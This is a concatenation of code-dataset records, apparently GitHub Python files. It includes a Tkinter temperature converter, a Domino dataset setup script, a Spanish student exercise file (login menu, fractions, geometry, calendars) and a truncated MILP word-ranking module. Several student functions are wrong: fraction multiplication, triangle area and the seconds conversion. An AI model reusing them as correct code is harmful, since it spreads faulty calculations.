import*\r\n\r\nroot=Tk()\r\n\r\nvar1=DoubleVar()\r\n\r\nvar2=DoubleVar()\r\n\r\n\r\nlabel=Label(root,text='TEMPERATURE CONVERTER',font=('Arial',30))\r\n\r\nlabel.pack(side=TOP)\r\n\r\n#temperature in Celcius box\r\nlabel1=Label(root,text='Temperture in Celcius =',font=('Arial',25))\r\n\r\nlabel1.place(x=200,y=200)\r\n\r\n#temperature in Fahrenheit box\r\nlabel2=Label(root,text='Temperture in Fahrenheit =',font=('Arial',25))\r\n\r\nlabel2.place(x=200,y=300)\r\n\r\n\r\nentry1=Entry(root,font=('Arial',25),textvariable=var1)\r\n\r\nentry1.place(x=600,y=200)\r\n\r\n\r\nlabel3=Label(root,font=('Arial',25))\r\n\r\nlabel3.place(x=600,y=300)\r\n\r\ndef click1():\r\n\r\n label3.config(text='' +str(var1.get() * 1.8 + 32)+ ' °F')\r\n\r\nbutton1=Button(root,text='Convert',font=('Arial',25),command=click1)\r\n\r\nbutton1.place(x=920,y=200)\r\n\r\n#temperature in Fahrenheit box\r\nlabel4=Label(root,text='Temperture in Fahrenheit =',font=('Arial',25))\r\n\r\nlabel4.place(x=200,y=400)\r\n#temperature in Celcius box\r\nlabel5=Label(root,text='Temperture in Celcius =',font=('Arial',25))\r\n\r\nlabel5.place(x=200,y=500)\r\n\r\n\r\nentry2=Entry(root,font=('Arial',25),textvariable=var2)\r\n\r\nentry2.place(x=600,y=400)\r\n\r\nlabel6=Label(root,font=('Arial',25))\r\nlabel6.place(x=600,y=500)\r\n\r\n#click button operation and conversion\r\ndef click2():\r\n\r\n label6.config(text='' +str((var2.get()-32)/1.8)+ ' °C')\r\n\r\nbutton2=Button(root,text='Convert',font=('Arial',25),command=click2)\r\n\r\nbutton2.place(x=920,y=400)\r\n\r\nroot.mainloop()\r\n","repo_name":"nidhijauhary/TemperatureConverter","sub_path":"Temprature Converter.py","file_name":"Temprature Converter.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75267592999","text":"\n\nimport os\nfrom subprocess import Popen, PIPE\nfrom Bio import Entrez, SeqIO\nimport time\nimport numpy as np\nimport pandas as pd\n\n\n# Output from satellite analysis.\nacc_list = '/media/ngs/py_projects/sat3/GI.csv'\n\ndf = pd.read_csv(acc_list)\ngi_list=open('gi_list.csv', 'w+')\n# Get GIs at int.\nI = []\nfor i, l in enumerate(df.GI):\n\n I.append(int(l.strip(\"['\").strip(\"']\")))\n gi_list.write( l.strip(\"['\").strip(\"']\") + \"\\n\")\n\ngi_list.close()\n\n# Output from satellite analysis.\ndat_file = '/media/ngs/py_projects/sat3/all_matches.dat'\n\ndf = pd.read_csv(dat_file, sep='\\t')\n#print(df)\n\n# Collect the transcript name.\nnames=df['transcript_name'].unique()\nacc_list=open('acc_list.csv','w+')\nfor i, l in enumerate(names):\n\n acc_list.write( l + \"\\n\")\n\nacc_list.close()","repo_name":"jmfrank/sat3","sub_path":"output_acc.py","file_name":"output_acc.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71107267559","text":"from domino import Domino\nimport os\n\ndomino = Domino(f\"{os.environ['DOMINO_PROJECT_OWNER']}/{os.environ['DOMINO_PROJECT_NAME']}\")\n\n# Create domino datasets\n\n# Required Datasets & Descriptions\nREQUIRED = {\n \"SDTMUNBLIND\": \"SDTMUNBLIND is created using RAW and UNBLIND\",\n \"SDTMBLIND\": \"SDTMBLIND is created using RAW and DUMMY\",\n \"METADATA\": \"Metadata file is copied by the SDTM project to the METADATA dataset and snapshotted with the study specific reference files.\"\n}\n\n# Existing Datasets\nCURRENT = set(d['datasetName'] for d in domino.datasets_list(project_id=os.environ[\"DOMINO_PROJECT_ID\"]))\n\n# For any required datasets which do not exist \nfor key in set(REQUIRED.keys()).difference(CURRENT):\n # Make them\n domino.datasets_create(key, REQUIRED[key])\n","repo_name":"dominodatalab/CDISC01_SDTM","sub_path":"utilities/init_datasets_sdtm.py","file_name":"init_datasets_sdtm.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"28691220239","text":"\"\"\"Usuarios:\n1. Diseña un programa que permite guardar el nombre de usuario y contraseña de\nhasta 10 usuarios diferentes. Si el usuario ya existe en el sistema, puede hacer\nlogin tras incluir un usuario y contraseña válidas hasta un máximo de tres\nintentos, momento en el que se bloquea su cuenta.\nSi el usuario no existe, puede crear una cuenta siempre que haya espacio\n(máximo 10), para lo que se le pedirá usuario y contraseña, así como la\nconfirmación de ésta última.\nEl menú de este programa permitirá identificarse y crear cuentas nuevas, así\ncomo mostrar todos los nombres de usuario existentes sin sus contraseñas.\"\"\"\n\nbaseUsuarios={\"MIKI\":\"123123\"}\n\ndef menu(opcion):\n pantalla=\"\"\"\n 1. Crear Usuario\n 2. Logear en el sistema\n 3. Mostrar Menu\n 4. Mostrar Base de datos\n 5. Salir\n \"\"\"\n salida=\"\"\n if opcion==1:\n print(\"Vamos a crear un usuario\")\n salida=1\n elif opcion==2:\n print(\"Vamos a logear\")\n salida=2\n elif opcion==3:\n print(pantalla)\n elif opcion==4:\n print(\"Mostrando base de datos\")\n salida=4\n elif opcion==5:\n print(\"Cerrando programa\")\n quit()\n else:\n print(\"Esa opcion no existe, introduce 3 para ver menu\")\n return salida\n\ndef crearUsuario(user, password, repeatpass,baseUsuarios=baseUsuarios):\n valid=0\n restrictions=\"1234567890!·$%&/()=?¿Çç*+^`¨´´';,.-_}{][|@#\\ºª¬ \"\n if len(baseUsuarios)==10:\n valid=0\n print(\"La base de datos esta llena\")\n elif user[0] in restrictions:\n valid=0\n print(\"El nombre de usuario debe empezar por un caracter alfabetico\")\n elif len(password)< 6:\n valid=0\n print(\"La contraseña tiene que tener almenos 6 caracteres\")\n elif password!=repeatpass:\n valid=0\n print(\"La contraseña no coincide\")\n else:\n valid=baseUsuarios[user]=password\n\n \n return valid\n\ndef logear(usuario,password,base_datos=baseUsuarios):\n valido=True\n fallos=0\n if base_datos.get(usuario)==\"Bloqueado\":\n print(\"El usuario esta bloqueado, contacte con su administrador\")\n elif usuario in base_datos and base_datos.get(usuario)!=\"Bloqueado\":\n while password!=base_datos[usuario] and fallos <=3:\n fallos+=1\n password=int(input(f\"Introduce de nuevo la contraseña (Intento {fallos}/3):\"))\n if fallos >=3:\n print(\"El usuario ha quedado bloqueado\")\n base_datos[usuario]=\"Bloqueado\"\n valido=False\n if valido==False:\n return valido\n if base_datos[usuario]==password:\n print(\"Accediendo al sistema\")\n valido=True\n \n else:\n print(\"El usuario no existe\")\n valido=False\n return valido\n\ndef main():\n try:\n opcion=0\n while opcion!=5:\n opcion=int(input(\"Introduce opcion: \"))\n if opcion==1 and len(baseUsuarios) <10:\n menu(1)\n user=input(\"Introduzca nombre de usuario deseado: \")\n password=input(\"Introduzca contraseña: \")\n repeatpass=input(\"Repita contraseña: \")\n if user in baseUsuarios:\n print(\"El usuario ya existe en el sistema\")\n menu(2)\n else:\n while crearUsuario(user,password,repeatpass)==0:\n user=input(\"Introduzca nombre de usuario deseado: \")\n password=input(\"Introduzca contraseña: \")\n repeatpass=input(\"Repita contraseña: \")\n \n\n elif opcion==2:\n menu(2)\n logear(usuario=input(\"Introduce usuario: \"), password=input(\"Introduce contraseña: \"))\n elif opcion==4:\n keys=\"\"\n menu(4)\n for i in baseUsuarios.keys():\n keys+=i+\" \"\n print(keys)\n else: menu(opcion)\n except ValueError:\n print(\"Introduce 3 para ver menu\")\n main()\n\nif __name__==\"__main__\":\n \n print(menu(3))\n main()\n \n\n \n#CALCULO\n\"\"\"1. Write a Python program to calculate the sum of digits of a number.\n\"\"\"\n\ndef sumarDigitos(numero):\n numero=str(numero)\n total=0\n for n in numero:\n total=total+int(n)\n\n return total\n\nassert(sumarDigitos(2)==2)\nassert(sumarDigitos(25)==7)\n\n\"\"\"2. Write a Python program to compute the greatest common divisor (GCD) of two\npositive integers\"\"\"\n\ndef maximo_comun_divisor(numero1,numero2):\n divisores1=[]\n divisores2=[]\n comunes=[]\n for div1 in range(1,numero1+1):\n if numero1%div1==0:\n divisores1.append(div1)\n for div2 in range(1,numero2+1):\n if numero2%div2==0:\n divisores2.append(div2)\n\n for i in divisores1:\n if i in divisores2:\n comunes.append(i)\n\n return comunes[-1]\n\n\nassert(maximo_comun_divisor(10,5)==5)\n\n\"\"\"3. Write a Python program to get the least common multiple (LCM) of two positive\nintegers.\n\"\"\"\n\ndef minimo_comun_multiplo(numero1,numero2):\n mcm=(numero1*numero2)/maximo_comun_divisor(numero1,numero2)\n return mcm\n\nassert(minimo_comun_multiplo(12,8)==24)\nassert(minimo_comun_multiplo(4,2)==4)\n\n\"\"\"4. Write a Python program that accepts two integers (n and i) and computes the value\nof n+nn+nnn+....\"\"\"\n\ndef sumar_patron(numero1, numero2):\n suma=\"\"\n for i in range(1,numero2+1):\n suma+=str(i*numero1)\n return int(suma)\n \nassert(sumar_patron(2,3)==246)\nassert(sumar_patron(1,5)==12345)\n\n\"\"\"5. Queremos crear un programa que trabaje con fracciones de la forma a/b. Para\nrepresentar una fracción vamos a utilizar dos enteros: numerador y denominador,\ncreando las siguientes funciones para trabajar con ellas:\ni. leer_fracción: La tarea de esta función es leer por teclado el numerador y el\ndenominador y la devuelve simplificada (Por ejemplo, si recibe 16/6 ⇒ 8/3)\nii. escribir_fracción: muestra por pantalla la fracción; si el denominador es 1, se\nmuestra sólo el numerador.\niii. calcular_mcd: Esta función recibe dos números y devuelve su máximo común\ndivisor.\niv. simplificar_fracción: simplifica una fracción. Para ello hay que dividir el\nnumerador y denominador por su MCD.\nv. sumar_fracciones: recibe dos funciones n1/d1 y n2/d2 y calcula su suma. La\nsuma de dos fracciones es otra fracción cuyo numerador n=n1*d2+d1*n2 y\ndenominador d=d1*d2, simplificando la fracción resultado.\nvi. restar_fracciones: resta dos fracciones, siendo el numerador de la resta\nn=n1*d2-d1*n2 y el denominador d=d1*d2, simplificando el resultado.\nvii. multiplicar_fracciones: recibe dos fracciones y calcula su producto, siendo el\nnumerador del producto n=n1*n2 y el denominador d=d1*d2 (simplificando).\nviii. dividir_fracciones: calcula el cociente de dos fracciones, siendo el numerador\nn=n1*d2 y denominador d=d1*n2 (simplificando el resultado).\n\"\"\"\n\ndef leer_fraccion(numerador,denominador):\n n=0\n if numerador>denominador:\n while n < numerador:\n n+=1\n if numerador%n==0 and denominador%n==0:\n numerador=numerador//n\n denominador=denominador//n\n return numerador,denominador\n\n\nassert(leer_fraccion(16,6)==(8,3))\n\ndef escribir_fraccion(numerador,denominador):\n fraccion=0\n if denominador==1:\n print(numerador)\n else:\n print(f\"{numerador}/{denominador}\")\n\nescribir_fraccion(2,5)\n\n\ndef simplificar_fraccion(numerador,denominador):\n numeradorsimp=numerador//maximo_comun_divisor(numerador,denominador)\n denominadorsimp=denominador//maximo_comun_divisor(numerador,denominador)\n return numeradorsimp, denominadorsimp\n\nassert(simplificar_fraccion(8,4)==(2,1))\n\ndef sumar_fraccion(numerador1,denominador1,numerador2,denominador2):\n numerador=(numerador1*denominador2)+(denominador1*numerador2)\n denominador=denominador1*denominador2\n return simplificar_fraccion(numerador,denominador)\n\ndef restar_fraccion(numerador1,denominador1,numerador2,denominador2):\n numerador=(numerador1*denominador2)-(denominador1*numerador2)\n denominador=denominador1*denominador2\n return simplificar_fraccion(numerador,denominador) \n\ndef multiplicar_fraccion(numerador1,denominador1,numerador2,denominador2):\n numerador=numerador1*denominador1\n denominador=denominador1*denominador2\n return simplificar_fraccion(numerador,denominador)\n\ndef dividir_fraccion(numerador1,denominador1,numerador2,denominador2):\n numerador=numerador1*denominador2\n denominador=numerador2*denominador1\n return simplificar_fraccion(numerador,denominador)\n\n\"\"\"6. Crear un programa que utilizando las funciones anteriores muestre el siguiente\nmenú:\na. Sumar dos fracciones: En esta opción se piden dos fracciones y se muestra el\nresultado.\nb. Restar dos fracciones: En esta opción se piden dos fracciones y se muestra la\nresta.\nc. Multiplicar dos fracciones: En esta opción se piden dos fracciones y se muestra el\nproducto.\nd. Dividir dos fracciones: En esta opción se piden dos fracciones y se muestra la\ncociente.\ne. Salir\"\"\"\n\nopcion=\"\"\npantalla=\"\"\"\na. Sumar dos fracciones.\nb. Restar dos pracciones.\nc. Multiplicar dos fracciones.\nd. Dividir dos fracciones.\ne. Salir\"\"\"\nwhile opcion != \"e\":\n print(pantalla)\n\n opcion=input(\"Introduzca una opcion: \").lower()\n\n if opcion==\"a\":\n print(sumar_fraccion(int(input(\"Introduzca numerador1: \")),int(input(\"Introduzca denominador1: \")),int(input(\"Introduzca numerador2: \")),int(input(\"Introduzca denominador2: \"))))\n elif opcion==\"b\":\n print(restar_fraccion(int(input(\"Introduzca numerador1: \")),int(input(\"Introduzca denominador1: \")),int(input(\"Introduzca numerador2: \")),int(input(\"Introduzca denominador2: \"))))\n elif opcion==\"c\":\n print(multiplicar_fraccion(int(input(\"Introduzca numerador1: \")),int(input(\"Introduzca denominador1: \")),int(input(\"Introduzca numerador2: \")),int(input(\"Introduzca denominador2: \"))))\n elif opcion==\"d\":\n print(dividir_fraccion(int(input(\"Introduzca numerador1: \")),int(input(\"Introduzca denominador1: \")),int(input(\"Introduzca numerador2: \")),int(input(\"Introduzca denominador2: \"))))\n else:\n print(\"\\nIntroduzca una opcion del menu\")\n\n\"\"\"Figuras:\n1. Define una función que calcule el área de un círculo dado su radio.\n2. Defina una función que dado el radio de un círculo devuelva su longitud.\n3. Función tal que dadas las coordenadas de dos puntos en el plano devuelve su\ndistancia euclídea. Un punto en el plano tiene dos coordenadas (abscisa y\nordenada), por lo tanto, la entrada a esta función son cuatro valores reales.\n4. Función tal que dadas las coordenadas de un triángulo en el plano, nos devuelve\nsu perímetro.\n5. Haciendo uso de la función anterior diseña otra que calcule su área.\n\"\"\"\n\ndef calcular_area_circulo(radio):\n PI=3.1416\n return f\"{PI*(radio**2):.2f}\"\n\ndef longitud_circulo(radio):\n PI=3.1416\n return f\"{PI*(radio*2):.2f}\"\n\ndef distancia_euclidea(x1,y1,x2,y2):\n return f\"{(((x2-x1)**2)+((y2-y1)**2))**0.5:.2f}\"\n\ndef perimetro_triangulo(x1,y1,x2,y2,x3,y3):\n return f\"{((((x2-x1)**2)+((y2-y1)**2))**0.5)+((((x3-x2)**2)+((y3-y2)**2))**0.5)+((((x3-x1)**2)+((y3-y1)**2))**0.5):.2f}\"\n\n\ndef area_triangulo(x1,y1,x2,y2,x3,y3):\n return f\"{(((((x2-x1)**2)+((y2-y1)**2))**0.5)+((((x3-x2)**2)+((y3-y2)**2))**0.5)+((((x3-x1)**2)+((y3-y1)**2))**0.5))*0.5:.2f}\"\n\n\n\"\"\"Fechas:\n1. Función que dado un instante (horas, minutos y segundos) devuelva el número\nde segundos transcurridos desde el inicio de un día hasta ese instante.\n2. Crea una función que devuelva la diferencia en segundos entre dos instantes de\ntiempo del mismo día. Recibirá como parámetros seis valores, hora, minuto y\nsegundo de cada uno de los instantes.\n3. Write a Python program to convert seconds to day, hour, minutes and seconds.\n4. Write a Python program to calculate the number of days between two dates.\n5. Write a Python program to print the calendar of a given month and year. If you\nfeel confident enough, extend it to cover a complete year (See annex).\n\"\"\"\n\ndef calcular_segundos(horas,minutos,segundos):\n if horas > 24 or minutos > 60 or segundos>60:\n print(\"Introduce horario valido\")\n else:\n return ((horas*60)*60)+(minutos*60)+segundos\n\nassert(calcular_segundos(2,0,0)==7200)\n\ndef diferencia_dia(horas1,minutos1,segundos1,horas2,minutos2,segundos2):\n instante1=calcular_segundos(horas1,minutos1,segundos1)\n instante2=calcular_segundos(horas2,minutos2,segundos2)\n return instante1-instante2\n\nassert(diferencia_dia(12,12,12,12,12,12)==0)\nassert(diferencia_dia(13,12,12,12,12,12)==3600)\n\ndef converetidor_horario(segundos):\n\n dias=int((segundos//60)//60)//24\n horas=int((segundos//60)//60)%24\n minutos=int(segundos//60)%60\n segundos=int(segundos)%120\n\n return dias, horas, minutos, segundos\nassert(converetidor_horario(118560)==(1,8,56,0))\n\ndef bisiesto(year):\n if (year %4==0) and (year%100!=0 or year%400==0):\n return True\n else:\n return False\n\ndef dias_pasados(dia,mes,year): #Ejercicio realizado en un boletin anterior\n try:\n meses=1\n meslargo=[3,5,7,8,10,12]\n totaldias=0\n totaltranscurrido=0\n if (dia >31 or dia < 1) or (mes>12 or mes<1) or (dia>29 and mes==2) or (dia==29 and bisiesto(year)==False):\n print(\"Introduzca una fecha correcta porfavor\")\n totaltranscurrido=False\n else:\n\n if mes==1:\n totaltranscurrido=dia\n elif bisiesto(year)==True:\n while meses < mes:\n if meses==2:\n totaldias+=29\n elif meses in meslargo:\n totaldias+=31\n else:\n totaldias+=30\n meses+=1\n totaltranscurrido=(totaldias)+(dia)+1\n else:\n while meses < mes:\n if meses==2:\n totaldias+=28\n elif meses in meslargo:\n totaldias+=31\n else:\n totaldias+=30\n meses+=1\n totaltranscurrido=(totaldias)+(dia)+1\n\n except:\n print(\"Introduzca valores en formato dd-mm-yyyy\")\n return totaltranscurrido\n\ndef dias_entre_fechas(dia1,mes1,year1,dia2,mes2,year2):\n years=0\n if year1!=year2:\n years=abs(year1-year2)*365\n return abs(dias_pasados(dia1,mes1,year1)-dias_pasados(dia2,mes2,year2))+years\n\nassert(dias_entre_fechas(24,2,2002,20,2,2002)==4)\n\ndef getDayOfWeek(day,month,year):\n daysmonth=[31,28,31,30,31,30,31,31,30,31,30,31]\n dayinweek={0:\"Domingo\",1:\"Lunes\",2:\"Martes\",3:\"Miercoles\",4:\"Jueves\",5:\"Viernes\",6:\"Sabado\"}\n try:\n if month<1 or year<1:\n print(\"Introduzca valores validos\")\n else:\n a = (14 - month)//12\n y = year - a\n m = month + 12 * a - 2\n d= int(((day + y + y//4 - y//100 + y//400 + (31*m)//12)%7))\n d=dayinweek[d]\n except:\n print(\"Valores invalidos\")\n return d\n\ndef calendar(month,year):\n calendario=\"\"\n day=getDayOfWeek(1,month,year)\n if day==\"Lunes\" and month==2 and bisiesto(year)==False:\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5 6 7\n 8 9 10 11 12 13 14\n 15 16 17 18 19 20 21\n 22 23 24 25 26 27 28\n \"\"\" \n elif day==\"Martes\" and month==2 and bisiesto(year)==False:\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5 6\n 7 8 9 10 11 12 13\n 14 15 16 17 18 19 20\n 21 22 23 24 25 26 27\n 28 \n \"\"\"\n elif day==\"Miercoles\" and month==2 and bisiesto(year)==False:\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5\n 6 7 8 9 10 11 12\n 13 14 15 16 17 18 19\n 20 21 22 23 24 25 26\n 27 28 \n \"\"\"\n elif day==\"Jueves\" and month==2 and bisiesto(year)==False:\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4\n 5 6 7 8 9 10 11\n 12 13 14 15 16 17 18\n 19 20 21 22 23 24 25\n 26 27 28 \n \"\"\" \n elif day==\"Viernes\" and month==2 and bisiesto(year)==False:\n calendario=\"\"\"\n L M X J V S D\n 1 2 3\n 4 5 6 7 8 9 10\n 11 12 13 14 15 16 17\n 18 19 20 21 22 23 24\n 25 26 27 28 \n \"\"\" \n elif day=='Sabado' and month==2 and bisiesto(year)==False:\n calendario=\"\"\"\n L M X J V S D\n 1 2\n 3 4 5 6 7 8 9\n 10 11 12 13 14 15 16\n 17 18 19 20 21 22 23\n 24 25 26 27 28 \n \n \"\"\"\n elif day==\"Domingo\" and month==2 and bisiesto(year)==False:\n calendario=\"\"\"\n L M X J V S D\n 1\n 2 3 4 5 6 7 8\n 9 10 11 12 13 14 15\n 16 17 18 19 20 21 22\n 23 24 25 26 27 28 \n \"\"\"\n elif day==\"Lunes\" and month==2 and bisiesto(year):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5 6 7\n 8 9 10 11 12 13 14\n 15 16 17 18 19 20 21\n 22 23 24 25 26 27 28\n 29\n \"\"\" \n elif day==\"Martes\" and month==2 and bisiesto(year):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5 6\n 7 8 9 10 11 12 13\n 14 15 16 17 18 19 20\n 21 22 23 24 25 26 27\n 28 29\n \"\"\"\n elif day==\"Miercoles\" and month==2 and bisiesto(year):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5\n 6 7 8 9 10 11 12\n 13 14 15 16 17 18 19\n 20 21 22 23 24 25 26\n 27 28 29\n \"\"\"\n elif day==\"Jueves\" and month==2 and bisiesto(year):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4\n 5 6 7 8 9 10 11\n 12 13 14 15 16 17 18\n 19 20 21 22 23 24 25\n 26 27 28 29 \n \"\"\" \n elif day==\"Viernes\" and month==2 and bisiesto(year):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3\n 4 5 6 7 8 9 10\n 11 12 13 14 15 16 17\n 18 19 20 21 22 23 24\n 25 26 27 28 29\n \"\"\" \n elif day=='Sabado' and month==2 and bisiesto(year):\n calendario=\"\"\"\n L M X J V S D\n 1 2\n 3 4 5 6 7 8 9\n 10 11 12 13 14 15 16\n 17 18 19 20 21 22 23\n 24 25 26 27 28 29\n \n \"\"\"\n elif day==\"Domingo\" and month==2 and bisiesto(year):\n calendario=\"\"\"\n L M X J V S D\n 1\n 2 3 4 5 6 7 8\n 9 10 11 12 13 14 15\n 16 17 18 19 20 21 22\n 23 24 25 26 27 28 29 \n \"\"\"\n elif day==\"Lunes\" and (str(month) in \"13578\" or month == 10 or month==12):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5 6 7\n 8 9 10 11 12 13 14\n 15 16 17 18 19 20 21\n 22 23 24 25 26 27 28\n 29 30 31\n \"\"\"\n elif day==\"Martes\" and (str(month) in \"13578\" or month == 10 or month==12):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5 6\n 7 8 9 10 11 12 13\n 14 15 16 17 18 19 20\n 21 22 23 24 25 26 27\n 28 29 30 31\n \"\"\"\n elif day==\"Miercoles\" and (str(month) in \"13578\" or month == 10 or month==12):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5\n 6 7 8 9 10 11 12\n 13 14 15 16 17 18 19\n 20 21 22 23 24 25 26\n 27 28 29 30 31\n \"\"\"\n elif day==\"Jueves\" and (str(month) in \"13578\" or month == 10 or month==12):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4\n 5 6 7 8 9 10 11\n 12 13 14 15 16 17 18\n 19 20 21 22 23 24 25\n 26 27 28 29 30 31 \n \"\"\" \n elif day==\"Viernes\" and (str(month) in \"13578\" or month == 10 or month==12):\n calendario=\"\"\"\n L M X J V S D\n 1 2 3\n 4 5 6 7 8 9 10\n 11 12 13 14 15 16 17\n 18 19 20 21 22 23 24\n 25 26 27 28 29 30 31\n \"\"\" \n elif day=='Sabado' and (str(month) in \"13578\" or month == 10 or month==12):\n calendario=\"\"\"\n L M X J V S D\n 1 2\n 3 4 5 6 7 8 9\n 10 11 12 13 14 15 16\n 17 18 19 20 21 22 23\n 24 25 26 27 28 29 30\n 31\n \"\"\"\n elif day==\"Domingo\" and (str(month) in \"13578\" or month == 10 or month==12):\n calendario=\"\"\"\n L M X J V S D\n 1\n 2 3 4 5 6 7 8\n 9 10 11 12 13 14 15\n 16 17 18 19 20 21 22\n 23 24 25 26 27 28 29\n 30 31\n \"\"\" \n elif day==\"Lunes\":\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5 6 7\n 8 9 10 11 12 13 14\n 15 16 17 18 19 20 21\n 22 23 24 25 26 27 28\n 29 30\n \"\"\"\n elif day==\"Martes\":\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5 6\n 7 8 9 10 11 12 13\n 14 15 16 17 18 19 20\n 21 22 23 24 25 26 27\n 28 29 30\n \"\"\"\n elif day==\"Miercoles\":\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4 5\n 6 7 8 9 10 11 12\n 13 14 15 16 17 18 19\n 20 21 22 23 24 25 26\n 27 28 29 30\n \"\"\"\n elif day==\"Jueves\":\n calendario=\"\"\"\n L M X J V S D\n 1 2 3 4\n 5 6 7 8 9 10 11\n 12 13 14 15 16 17 18\n 19 20 21 22 23 24 25\n 26 27 28 29 30 \n \"\"\" \n elif day==\"Viernes\":\n calendario=\"\"\"\n L M X J V S D\n 1 2 3\n 4 5 6 7 8 9 10\n 11 12 13 14 15 16 17\n 18 19 20 21 22 23 24\n 25 26 27 28 29 30\n \"\"\" \n elif day=='Sabado':\n calendario=\"\"\"\n L M X J V S D\n 1 2\n 3 4 5 6 7 8 9\n 10 11 12 13 14 15 16\n 17 18 19 20 21 22 23\n 24 25 26 27 28 29 30\n \n \"\"\"\n elif day==\"Domingo\":\n calendario=\"\"\"\n L M X J V S D\n 1\n 2 3 4 5 6 7 8\n 9 10 11 12 13 14 15\n 16 17 18 19 20 21 22\n 23 24 25 26 27 28 29\n 30\n \"\"\" \n return calendario \n\n\nprint(calendar(3,2001))\n","repo_name":"W3irdev/Python","sub_path":"programacionModular/Boletin4.py","file_name":"Boletin4.py","file_ext":"py","file_size_in_byte":24509,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19117671734","text":"############################################################\n# Module : Bansal paper milp\n# Date : December 10th\n# Author : Xiao Ling\n############################################################\n\nfrom pulp import *\nfrom prelude import * \nfrom utils import *\nfrom server import * \nfrom client import * \nfrom app import * \nfrom nltk.corpus import wordnet as wn\n\n\n############################################################\n# All\n\ndef milp(app):\n\n two = app.TwoSided\n ranking = [milp_no_syn(gold,app) for _,_,gold in two.test()]\n\n taus = [r['tau'] for r in ranking]\n taus2 = [r['tau-notie'] for r in ranking]\n taus_max = [r['tau-max'] for r in ranking]\n taus2_max = [r['tau-notie-max'] for r in ranking]\n pairs = [r['pairwise'] for r in ranking]\n\n avg_tau = sum(taus) / sum(taus_max)\n avg_abs_tau = sum(abs(t) for t in taus) / sum(abs(t) for t in taus_max)\n avg_tau2 = sum(taus2) / sum(taus2_max)\n avg_abs_tau2 = sum(abs(t) for t in taus2) / sum(abs(t) for t in taus_max)\n avg_pair = sum(pairs) / len(pairs)\n\n\n avg_tau_max = sum(taus_max) / len(taus_max)\n avg_abs_tau_max = sum(abs(t) for t in taus_max) / len(taus_max)\n avg_tau2_max = sum(taus2_max) / len(taus_max)\n avg_abs_tau2_max= sum(abs(t) for t in taus2_max) / len(taus_max)\n\n return {'ranking' : ranking\n ,'pattern' : two.pattern()\n ,'average' : {'tau' : avg_tau\n ,'tau-notie' : avg_tau2\n ,'absolute-tau' : avg_abs_tau\n ,'absolute-tau-no-tie' : avg_abs_tau2\n ,'pair-wise' : avg_pair \n # \n ,'regret-tau' : avg_tau_max\n ,'regret-|tau|' : avg_tau_max\n ,'regret-tau-no-tie' : avg_tau_max\n ,'regret-|tau|-no-tie' : avg_tau_max\n } \n }\n\n############################################################\n# rank each cluster\n\n'''\n @Use: Given gold standard and server,\n output algo ranking\n no synonyms considered\n'''\ndef milp_no_syn(gold, app):\n\n print ('ranking words ' + str(gold))\n\n words = join(gold)\n\n for k in range(0,10): shuffle(words)\n\n pairs = [u + '=' + v for u in words for v in words if u != v]\n (scores,C) = to_score(pairs,app)\n\n no_data = all(v == 0 for v in [scores[k] for k in scores])\n\n\n '''\n If absolutely no data for any pairs of words, output ties\n If there is any data at all, run Bansal' method\n '''\n if no_data: algo = [words]\n else : algo = bansal_milp(words,pairs,scores,C)\n\n return {'gold' : gold\n ,'algo' : algo\n ,'tau' : tau (gold,algo)\n ,'tau-max' : tau (gold,gold) # need this since max tau not necessarily 1.0\n ,'tau-notie' : tau2(gold,algo)\n ,'tau-notie-max' : tau2(gold,gold)\n ,'pairwise' : pairwise_accuracy(gold,algo)\n ,'raw-score' : scores\n ,'raw-stat' : dict()}\n\n'''\n Banasl's Milp method\n'''\ndef bansal_milp(words,pairs,scores,C):\n\n '''\n initialize problem\n ''' \n prob = LpProblem('-'.join(words), LpMaximize)\n\n '''\n initialize variables\n ''' \n x = dict() # real value of each x_i on [0,1]\n d = dict() # real value of distance between every x_i, x_j, i != j\n w = dict() # integral value where w_ij => i < j\n s = dict() # integral value where s_ij => i > j\n\n for uv in pairs:\n w[uv] = LpVariable('w_' + uv, 0, 1, LpInteger )\n s[uv] = LpVariable('s_' + uv, 0, 1, LpInteger )\n d[uv] = LpVariable('d_' + uv, 0, 1, LpContinuous)\n\n for u in words:\n x[u] = LpVariable('x_' + u, 0, 1, LpContinuous) \n\n\n '''\n objective function\n '''\n objective = [ (w[ij] - s[ij]) * scores[ij] \\\n for ij in pairs ]\n\n prob += lpSum(objective)\n\n '''\n constraints\n '''\n # d_ij = x_j - x_i\n for ij in pairs:\n [i,j] = ij.split('=')\n prob += x[j] - x[i] == d[ij]\n\n # d_ij - w_ij * C <= 0\n for ij in pairs:\n prob += d[ij] - w[ij] * C <= 0\n\n # d_ij + (1 - w_ij) * C > 0\n for ij in pairs:\n prob += d[ij] + (1 - w[ij]) * C >= 0\n\n # d_ij + s_ij * C >= 0\n for ij in pairs:\n prob += d[ij] + s[ij] * C >= 0\n\n # d_ij - (1 - sij) * C < 0\n for ij in pairs:\n prob += d[ij] - (1 - s[ij]) * C <= 0\n\n '''\n solve and interpret data\n '''\n\n prob.solve()\n\n algo = prob_to_algo_rank(prob,words)\n\n return algo \n\n\n############################################################\n# scores\n\ndef is_synonym(u,v):\n u_syns = join([x.lemma_names() for x in wn.synsets(u)])\n v_syns = join([x.lemma_names() for x in 